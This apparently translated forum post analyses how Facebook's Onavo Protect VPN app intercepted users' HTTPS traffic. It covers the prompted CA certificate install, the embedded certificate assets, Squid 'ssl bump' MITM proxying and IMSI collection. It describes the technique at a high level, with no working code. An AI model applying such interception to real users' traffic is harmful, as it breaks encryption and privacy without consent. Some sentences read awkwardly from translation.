Man
Professional
- Messages
- 3,223
- Reaction score
- 915
- Points
- 113

Reverse engineering of the Onavo Protect VPN service for Android has revealed methods that can be used to intercept encrypted HTTPS traffic on a mobile device. In short, an attacker must install their own application and a CA certificate on the phone. For example, a law has come into force.
in the Russian Federation that requires mandatory pre-installation of specific applications on all smartphones from 2025. Theoretically, if there are vulnerabilities, this could threaten the security of many users.
An example of interception of encrypted traffic is shown by a technical analysis of the operation of the Facebook mobile application on devices with the Onavo Protect application installed (a security program that works on the VPN principle).
Background
Court documents show that the company's internal surveillance project was called Project Ghostbusters. It was part of the In-App Action Panel (IAPP) program, which used a technique to "intercept and decrypt" encrypted app traffic from Snapchat users, and later from YouTube and Amazon users. Initially, this was done for the purpose of collecting analytics, i.e., monitoring user activity.
To do this, the developers used a program called Onavo Protect, which Facebook bought in 2013. In 2019, the service was shut down after an investigation into its misuse, and the developers were fined.
Technical analysis
In this case, HTTPS traffic was intercepted using a MITM attack. The developers themselves called this technique 'ssl bump', after the function of the same name from the Squid caching proxy. The attack algorithm is schematically depicted on the KDPV.
The interception was carried out using the Onavo Protect mobile application, which prompted the user to install the CA certificate in the trusted storage on the device. In addition, the function required several permissions on the phone, which the application allegedly requested "to display traffic statistics":

While the court documents say the certificates are "generated on the server and sent to the device," some older versions of the app contain certificates directly within the app as embedded assets old_ca.cerand new_ca.cer:

Certificates are located in the folder assets:

One of the certificates is valid until 2027. A method was found in the application code KeyChain.createInstallIntent()that installed the certificate:

There is also a procedure to check whether the certificate is installed or not:

This method was used only in early versions of the program, since Android 7 the user had to install certificates manually.
Then all the device traffic went through a VPN to the infrastructure controlled by the attacker. The traffic is redirected to a Squid caching proxy server, configured as a transparent proxy with the function ssl bump.
Copy of the email describing the technique from the court documents:

In addition to the main function of collecting analytics from other applications by abusing permission from the user, Onavo has functions for obtaining other sensitive data, such as the subscriber's IMSI :

Although the story happened several years ago, from a technical point of view it is interesting to see how far app developers can go by abusing permissions on mobile phones (the developer is now under lawsuit). Of interest is also the launch of the CA installation procedure and how the certificates were added to the operating system.
Shortly after the story described in 2020, a new version of Android 11 was released, in which it is almost impossible to install your own CA certificate that is valid for all applications, so on new smartphones, developers suggest using other techniques, for example, Accessibility API.
Source